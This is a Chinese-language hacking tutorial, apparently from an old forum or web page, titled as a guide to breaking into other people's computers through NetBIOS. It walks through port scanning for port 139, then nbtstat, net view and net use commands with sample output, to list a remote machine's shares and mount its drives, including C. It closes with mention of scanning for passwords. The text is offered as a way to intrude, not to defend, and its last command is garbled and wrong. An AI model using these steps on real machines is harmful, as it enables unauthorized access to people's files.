利用NetBIOS浏览入侵他人电脑

NetBIOS （Network basic input output system）即网络基本输入输出系统。它在Windows系统中用于文件和打印机共享。
1. NetBIOS
To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:
要远程使用NetBIOS，目标计算机必须运行该服务并未对之实施保护。可以打开端口扫描器进行扫描：
25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn
如果结果如上，恭喜...
2. nbtstat
我们可以使用nbtstat获得攻击所需信息。打开WinXP的控制台或早期Windows版本的命令行。

输入命令:
-
c:\>nbtstat -A 127.0.0.1
-
如果使用IP地址就使用-A，使用主机名则使用-a.
运行后将获得如下信息：
code:-
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []
字串8

NetBIOS Remote Machine Name Table
Name Type Status
-
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered
MAC Address = xx-xx-xx-xx-xx-xx

下面这一行
-
computername <20> UNIQUE Registered

很有用，因为<20>表示文件共享已经启用了。 那就意味着我们可以尝试连接到该电脑。
首先，我们需要知道硬盘名称等信息，并且我们还需要知道它是否安装的是XP以及有没有开放文件共享。可以使用命令：
net view \\ipaddress来完成。
输入:

C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name Type Used as Comment 字串1
-
SharedDocs Disk
The command completed successfully.

应该获得如上显示信息 (在非XP系统中会有所不同).
该做点有趣的事情了: 如果想要像使用本地计算机一样使用和浏览该电脑，我们可以使用net use。格式如下：
net use letter: \\ipaddress\name
输入:
-
c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.
-

现在目标计算机的硬盘已映射为我们刚刚指定的盘符。（确保这一盘符不与本地电脑已使用盘符冲突）完成后就可以如同浏览本地电脑一样进行浏览 ：
输入:

c:\>cd g:
g:\>
-

在windows XP中，可以直接打开“我的电脑”，在图形界面下浏览刚刚添加的映射盘.
完成后，记得要从机器中删除映射盘。
字串5

输入:

c:\>net use /delete g:
g: was deleted successfully.

有些系统需要密码才可以进入 (win2k, WinNT): （可以通过扫描器扫描）
获得密码后可使用如下命令进入:

net use password \\ip\sharename
-